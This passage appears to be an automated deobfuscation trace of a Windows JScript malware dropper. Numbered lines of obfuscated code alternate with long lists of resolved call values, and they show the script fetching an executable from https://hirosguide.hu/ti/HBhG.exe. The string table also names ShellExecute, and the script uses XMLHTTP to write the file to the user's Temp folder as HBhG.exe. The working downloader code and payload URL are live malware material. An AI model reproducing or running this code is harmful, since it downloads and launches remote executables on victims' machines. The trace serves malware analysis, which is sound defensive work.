                                                                                                                                                                    • decodeURIComponent("%c2%b5%c2%8a%c2%9f%1f%c3%b5%67%c3%84%73%c2%bc%1d") ➔ "\xb5\x8a\x9f\x1f\xf5g\xc4s\xbc\x1d"
                                                                                                                                                                    • decodeURIComponent("%e7%7e%b9%eb%58%b3%0c%b9%ef") ➔ undefined
                                                                                                                                                                    84
                                                                                                                                                                    },
                                                                                                                                                                      85
                                                                                                                                                                      _0x1797c9 = function (_0x4c91b5, _0x1398ec) {
                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("WP/cHWdcICk+W6CiFCoVWRWwjG","$$%7") ➔ "\xdf(\x85x\x18\xef\xddy\xdc\xb3F\xa4"
                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("7728888BzvkvV","NnEE") ➔ undefined
                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("934406fwGgPc","$$%7") ➔ undefined
                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("3428070zJPwOJ","$$%7") ➔ undefined
                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("gCk/WPVdMa","$$%7") ➔ "Y\x10\x1e)"
                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("Shell.Application","NnEE") ➔ undefined
                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("W7BdICoxwmo0W5TdySkoWPGi","$$%7") ➔ "\xb6fR\xa9R\xd3\x96f\xbd\x97X"
                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("WO41qK7cRvBcISoBWQBcVJxcMW","NnEE") ➔ "\xc3\xaew\x18\x8f\xca\x9b\xa6\xe0\x0c\xfb0"
                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("WRxcISkFh8o1z8oeC8k8hq","$$%7") ➔ "\xf5%\x1a\xeeSo\x11w\x8f\x12"
                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("536561IZdlNV","NnEE") ➔ undefined
                                                                                                                                                                      86
                                                                                                                                                                      var _0x24b005 = _0x362c09, _0x2f4146 = _0x4692, _0x49e4a2 = [], _0x48a169 = 0x0, _0xb2084f, _0xb558fe = '';
                                                                                                                                                                        87
                                                                                                                                                                        _0x4c91b5 = _0x30eaf9 ( _0x4c91b5 );
                                                                                                                                                                        • _0x30eaf9("WP/cHWdcICk+W6CiFCoVWRWwjG") ➔ "\x9f\x87\x00\x89\xbe\xe7\x08}\xef\xbc\x16&"
                                                                                                                                                                        • _0x30eaf9("7728888BzvkvV") ➔ undefined
                                                                                                                                                                        • _0x30eaf9("934406fwGgPc") ➔ undefined
                                                                                                                                                                        • _0x30eaf9("3428070zJPwOJ") ➔ undefined
                                                                                                                                                                        • _0x30eaf9("gCk/WPVdMa") ➔ "\x19\xbf\x9b\xd8"
                                                                                                                                                                        • _0x30eaf9("Shell.Application") ➔ undefined
                                                                                                                                                                        • _0x30eaf9("W7BdICoxwmo0W5TdySkoWPGi") ➔ "\xf6\xc9\xd7X\xf4\xdbCb\x8e\x98\x08"
                                                                                                                                                                        • _0x30eaf9("WO41qK7cRvBcISoBWQBcVJxcMW") ➔ "\x8e5BN\xadV\x8a\xdb\xa6\xbe5\x9b"
                                                                                                                                                                        • _0x30eaf9("WRxcISkFh8o1z8oeC8k8hq") ➔ "\xb5\x8a\x9f\x1f\xf5g\xc4s\xbc\x1d"
                                                                                                                                                                        • _0x30eaf9("536561IZdlNV") ➔ undefined
                                                                                                                                                                        88
                                                                                                                                                                        var _0x5f5b3e;
                                                                                                                                                                          89
                                                                                                                                                                          for ( _0x5f5b3e = 0x0 ; _0x5f5b3e < 0x100 ; _0x5f5b3e ++ )
                                                                                                                                                                            90
                                                                                                                                                                            {
                                                                                                                                                                              91
                                                                                                                                                                              _0x49e4a2[_0x5f5b3e] = _0x5f5b3e;
                                                                                                                                                                                92
                                                                                                                                                                                }
                                                                                                                                                                                  93
                                                                                                                                                                                  for ( _0x5f5b3e = 0x0 ; _0x5f5b3e < 0x100 ; _0x5f5b3e ++ )
                                                                                                                                                                                    94
                                                                                                                                                                                    {
                                                                                                                                                                                      95
                                                                                                                                                                                      _0x48a169 = ( _0x48a169 + _0x49e4a2[_0x5f5b3e] + _0x1398ec['charCodeAt'] ( _0x5f5b3e % _0x1398ec[_0x2f4146 ( 0x198, 'FO#u' ) ] ) ) % 0x100, _0xb2084f = _0x49e4a2[_0x5f5b3e], _0x49e4a2[_0x5f5b3e] = _0x49e4a2[_0x48a169], _0x49e4a2[_0x48a169] = _0xb2084f;
                                                                                                                                                                                      • _0x2f4146(408,"FO#u") ➔ "length"
                                                                                                                                                                                      • _0x2f4146(408,"FO#u") ➔ "length"
                                                                                                                                                                                      • _0x2f4146(408,"FO#u") ➔ "length"
                                                                                                                                                                                      • _0x2f4146(408,"FO#u") ➔ "length"
                                                                                                                                                                                      • _0x2f4146(408,"FO#u") ➔ "length"
                                                                                                                                                                                      • _0x2f4146(408,"FO#u") ➔ "length"
                                                                                                                                                                                      • _0x2f4146(408,"FO#u") ➔ "length"
                                                                                                                                                                                      • _0x2f4146(408,"FO#u") ➔ "length"
                                                                                                                                                                                      • _0x2f4146(408,"FO#u") ➔ "length"
                                                                                                                                                                                      • _0x2f4146(408,"FO#u") ➔ "length"
                                                                                                                                                                                      96
                                                                                                                                                                                      }
                                                                                                                                                                                        97
                                                                                                                                                                                        _0x5f5b3e = 0x0, _0x48a169 = 0x0;
                                                                                                                                                                                          98
                                                                                                                                                                                          for ( var _0x3036c0 = 0x0 ; _0x3036c0 < _0x4c91b5[_0x2f4146 ( 0x177, 'k^uw' ) ] ; _0x3036c0 ++ )
                                                                                                                                                                                          • _0x2f4146(375,"k^uw") ➔ "length"
                                                                                                                                                                                          • _0x2f4146(375,"k^uw") ➔ "length"
                                                                                                                                                                                          • _0x2f4146(375,"k^uw") ➔ "length"
                                                                                                                                                                                          • _0x2f4146(375,"k^uw") ➔ "length"
                                                                                                                                                                                          • _0x2f4146(375,"k^uw") ➔ "length"
                                                                                                                                                                                          • _0x2f4146(375,"k^uw") ➔ "length"
                                                                                                                                                                                          • _0x2f4146(375,"k^uw") ➔ "length"
                                                                                                                                                                                          • _0x2f4146(375,"k^uw") ➔ "length"
                                                                                                                                                                                          • _0x2f4146(375,"k^uw") ➔ "length"
                                                                                                                                                                                          • _0x2f4146(375,"k^uw") ➔ "length"
                                                                                                                                                                                          99
                                                                                                                                                                                          {
                                                                                                                                                                                            100
                                                                                                                                                                                            _0x5f5b3e = ( _0x5f5b3e + 0x1 ) % 0x100, _0x48a169 = ( _0x48a169 + _0x49e4a2[_0x5f5b3e] ) % 0x100, _0xb2084f = _0x49e4a2[_0x5f5b3e], _0x49e4a2[_0x5f5b3e] = _0x49e4a2[_0x48a169], _0x49e4a2[_0x48a169] = _0xb2084f, _0xb558fe += String[_0x24b005 ( 0x19d ) ] ( _0x4c91b5[_0x24b005 ( 0x179 ) ] ( _0x3036c0 ) ^ _0x49e4a2[( _0x49e4a2[_0x5f5b3e] + _0x49e4a2[_0x48a169] ) % 0x100] );
                                                                                                                                                                                            • _0x24b005(413) ➔ "fromCharCode"
                                                                                                                                                                                            • _0x24b005(377) ➔ "charCodeAt"
                                                                                                                                                                                            • _0x24b005(413) ➔ "fromCharCode"
                                                                                                                                                                                            • _0x24b005(377) ➔ "charCodeAt"
                                                                                                                                                                                            • _0x24b005(413) ➔ "fromCharCode"
                                                                                                                                                                                            • _0x24b005(377) ➔ "charCodeAt"
                                                                                                                                                                                            • _0x24b005(413) ➔ "fromCharCode"
                                                                                                                                                                                            • _0x24b005(377) ➔ "charCodeAt"
                                                                                                                                                                                            • _0x24b005(413) ➔ "fromCharCode"
                                                                                                                                                                                            • _0x24b005(377) ➔ "charCodeAt"
                                                                                                                                                                                            • _0x24b005(413) ➔ "fromCharCode"
                                                                                                                                                                                            • _0x24b005(377) ➔ "charCodeAt"
                                                                                                                                                                                            • _0x24b005(413) ➔ "fromCharCode"
                                                                                                                                                                                            • _0x24b005(377) ➔ "charCodeAt"
                                                                                                                                                                                            • _0x24b005(413) ➔ "fromCharCode"
                                                                                                                                                                                            • _0x24b005(377) ➔ "charCodeAt"
                                                                                                                                                                                            • _0x24b005(413) ➔ "fromCharCode"
                                                                                                                                                                                            • _0x24b005(377) ➔ "charCodeAt"
                                                                                                                                                                                            • _0x24b005(413) ➔ "fromCharCode"
                                                                                                                                                                                            • _0x24b005(377) ➔ "charCodeAt"
                                                                                                                                                                                            101
                                                                                                                                                                                            }
                                                                                                                                                                                              102
                                                                                                                                                                                              return _0xb558fe;
                                                                                                                                                                                                103
                                                                                                                                                                                                };
                                                                                                                                                                                                  104
                                                                                                                                                                                                  _0x9bc2[_0x2f9df9 ( 0x1ae, 'c5R#' ) ] = _0x1797c9, _0x27272b = arguments, _0x9bc2[_0x362c09 ( 0x1a2 ) ] = ! ! [];
                                                                                                                                                                                                  • _0x2f9df9(430,"c5R#") ➔ "DxFUKe"
                                                                                                                                                                                                  • _0x362c09(418) ➔ "FnVtWB"
                                                                                                                                                                                                  • _0x2f9df9(430,"c5R#") ➔ "DxFUKe"
                                                                                                                                                                                                  • _0x362c09(418) ➔ "FnVtWB"
                                                                                                                                                                                                  • _0x2f9df9(430,"c5R#") ➔ "DxFUKe"
                                                                                                                                                                                                  • _0x362c09(418) ➔ "FnVtWB"
                                                                                                                                                                                                  • _0x2f9df9(430,"c5R#") ➔ "DxFUKe"
                                                                                                                                                                                                  • _0x362c09(418) ➔ "FnVtWB"
                                                                                                                                                                                                  • _0x2f9df9(430,"c5R#") ➔ "DxFUKe"
                                                                                                                                                                                                  • _0x362c09(418) ➔ "FnVtWB"
                                                                                                                                                                                                  • _0x2f9df9(430,"c5R#") ➔ "DxFUKe"
                                                                                                                                                                                                  • _0x362c09(418) ➔ "FnVtWB"
                                                                                                                                                                                                  • _0x2f9df9(430,"c5R#") ➔ "DxFUKe"
                                                                                                                                                                                                  • _0x362c09(418) ➔ "FnVtWB"
                                                                                                                                                                                                  • _0x2f9df9(430,"c5R#") ➔ "DxFUKe"
                                                                                                                                                                                                  • _0x362c09(418) ➔ "FnVtWB"
                                                                                                                                                                                                  • _0x2f9df9(430,"c5R#") ➔ "DxFUKe"
                                                                                                                                                                                                  • _0x362c09(418) ➔ "FnVtWB"
                                                                                                                                                                                                  • _0x2f9df9(430,"c5R#") ➔ "DxFUKe"
                                                                                                                                                                                                  • _0x362c09(418) ➔ "FnVtWB"
                                                                                                                                                                                                  105
                                                                                                                                                                                                  }
                                                                                                                                                                                                    106
                                                                                                                                                                                                    var _0x552e53 = _0x516962[0x0], _0x5951ff = _0x58b09d + _0x552e53, _0x29a719 = _0x27272b[_0x5951ff];
                                                                                                                                                                                                      107
                                                                                                                                                                                                      return ! _0x29a719 ? ( _0x9bc2[_0x362c09 ( 0x18c ) ] === undefined && ( _0x9bc2[_0x2f9df9 ( 0x191, 'MkZg' ) ] = ! ! [] ), _0x144afa = _0x9bc2[_0x2f9df9 ( 0x1a1, 'k^uw' ) ] ( _0x144afa, _0x47e3e8 ), _0x27272b[_0x5951ff] = _0x144afa ) : _0x144afa = _0x29a719, _0x144afa;
                                                                                                                                                                                                      • _0x362c09(396) ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(401,"MkZg") ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(417,"k^uw") ➔ "DxFUKe"
                                                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("WP/cHWdcICk+W6CiFCoVWRWwjG","$$%7") ➔ "\xdf(\x85x\x18\xef\xddy\xdc\xb3F\xa4"
                                                                                                                                                                                                      • _0x362c09(396) ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(401,"MkZg") ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(417,"k^uw") ➔ "DxFUKe"
                                                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("7728888BzvkvV","NnEE") ➔ undefined
                                                                                                                                                                                                      • _0x362c09(396) ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(401,"MkZg") ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(417,"k^uw") ➔ "DxFUKe"
                                                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("934406fwGgPc","$$%7") ➔ undefined
                                                                                                                                                                                                      • _0x362c09(396) ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(401,"MkZg") ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(417,"k^uw") ➔ "DxFUKe"
                                                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("3428070zJPwOJ","$$%7") ➔ undefined
                                                                                                                                                                                                      • _0x362c09(396) ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(401,"MkZg") ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(417,"k^uw") ➔ "DxFUKe"
                                                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("gCk/WPVdMa","$$%7") ➔ "Y\x10\x1e)"
                                                                                                                                                                                                      • _0x362c09(396) ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(401,"MkZg") ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(417,"k^uw") ➔ "DxFUKe"
                                                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("Shell.Application","NnEE") ➔ undefined
                                                                                                                                                                                                      • _0x362c09(396) ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(401,"MkZg") ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(417,"k^uw") ➔ "DxFUKe"
                                                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("W7BdICoxwmo0W5TdySkoWPGi","$$%7") ➔ "\xb6fR\xa9R\xd3\x96f\xbd\x97X"
                                                                                                                                                                                                      • _0x362c09(396) ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(401,"MkZg") ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(417,"k^uw") ➔ "DxFUKe"
                                                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("WO41qK7cRvBcISoBWQBcVJxcMW","NnEE") ➔ "\xc3\xaew\x18\x8f\xca\x9b\xa6\xe0\x0c\xfb0"
                                                                                                                                                                                                      • _0x362c09(396) ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(401,"MkZg") ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(417,"k^uw") ➔ "DxFUKe"
                                                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("WRxcISkFh8o1z8oeC8k8hq","$$%7") ➔ "\xf5%\x1a\xeeSo\x11w\x8f\x12"
                                                                                                                                                                                                      • _0x362c09(396) ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(401,"MkZg") ➔ "UGpDBa"
                                                                                                                                                                                                      • _0x2f9df9(417,"k^uw") ➔ "DxFUKe"
                                                                                                                                                                                                      • function (_0x58b09d, _0x47e3e8).DxFUKe("536561IZdlNV","NnEE") ➔ undefined
                                                                                                                                                                                                      108
                                                                                                                                                                                                      }, _0x9bc2 ( _0x27272b, _0x399a4e );
                                                                                                                                                                                                        109
                                                                                                                                                                                                        }
                                                                                                                                                                                                          110
                                                                                                                                                                                                          var pOut = new ActiveXObject ( _0x25c5ce ( 0x192 ) ) [_0x2bbb97 ( 0x101, _0x25c5ce ( 0x189 ) ) ] ( 0x2 ) + _0x25c5ce ( 0x18a ), Object = WScript[_0x2bbb97 ( 0x112, _0x25c5ce ( 0x1a6 ) ) ] ( _0x106d34 ( 0x10d ) );
                                                                                                                                                                                                          • _0x25c5ce(402) ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                          • _0x25c5ce(393) ➔ "B@T8"
                                                                                                                                                                                                          • _0x2bbb97(257,"B@T8") ➔ "GetSpecialFolder"
                                                                                                                                                                                                          • GetSpecialFolder(2) ➔ C:\Users\engineer\AppData\Local\Temp
                                                                                                                                                                                                          • _0x25c5ce(394) ➔ "\HBhG.exe"
                                                                                                                                                                                                          • _0x25c5ce(422) ➔ "QJRI"
                                                                                                                                                                                                          • _0x2bbb97(274,"QJRI") ➔ "CreateObject"
                                                                                                                                                                                                          • _0x106d34(269) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                                                          • Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
                                                                                                                                                                                                          111
                                                                                                                                                                                                          Object['Open'] ( 'GET', _0x2bbb97 ( 0x118, _0x25c5ce ( 0x1a5 ) ), ! [] ), Object['Send'] ( );
                                                                                                                                                                                                          • _0x25c5ce(421) ➔ "hLEa"
                                                                                                                                                                                                          • _0x2bbb97(280,"hLEa") ➔ "https://hirosguide.hu/ti/HBhG.exe"
                                                                                                                                                                                                          • Open("GET","https://hirosguide.hu/ti/HBhG.exe",false) ➔ undefined
                                                                                                                                                                                                          • Send() ➔ undefined
                                                                                                                                                                                                          112
                                                                                                                                                                                                          function _0x4692(_0x5bb6db, _0x386215) {
                                                                                                                                                                                                          • _0x4692(407,"Ak^H") ➔ "t\x9b\x9dK h\xe8F.O\x1b\x14\xf9f]A\xf3~\xfe\xdd\xeb\x93\xac$"
                                                                                                                                                                                                          • _0x4692(399,"#k&M") ➔ "7\x11ov\x15\x8c\xf9\xf9#\xe5 \xc9{\x91\x14 Y5k\xb9\x8d\xc9\xbeW\xc3\xb4\xb5\xa45cY>3\xac"
                                                                                                                                                                                                          • _0x4692(407,"Ak^H") ➔ "139783InEZVB"
                                                                                                                                                                                                          • _0x4692(399,"#k&M") ➔ "460SvEvgK"
                                                                                                                                                                                                          • _0x4692(405,"4j$p") ➔ "WO41qK7cRvBcISoBWQBcVJxcMW"
                                                                                                                                                                                                          • _0x4692(368,"A]GT") ➔ "536561IZdlNV"
                                                                                                                                                                                                          • _0x4692(370,"R8Tp") ➔ "ScriptFullName"
                                                                                                                                                                                                          • _0x4692(374,"6cTY") ➔ "WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48"
                                                                                                                                                                                                          • _0x4692(398,"*zp8") ➔ "o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa"
                                                                                                                                                                                                          • _0x4692(380,"fXty") ➔ "32292SPYXOk"
                                                                                                                                                                                                          113
                                                                                                                                                                                                          var _0x2a78ae = _0x2a78 ( );
                                                                                                                                                                                                          • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                                                                                                                          • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                                                                                                                                                                          • _0x2a78() ➔ EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w,ymkUWO3cOMS
                                                                                                                                                                                                          • _0x2a78() ➔ EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w,ymkUWO3cOMS
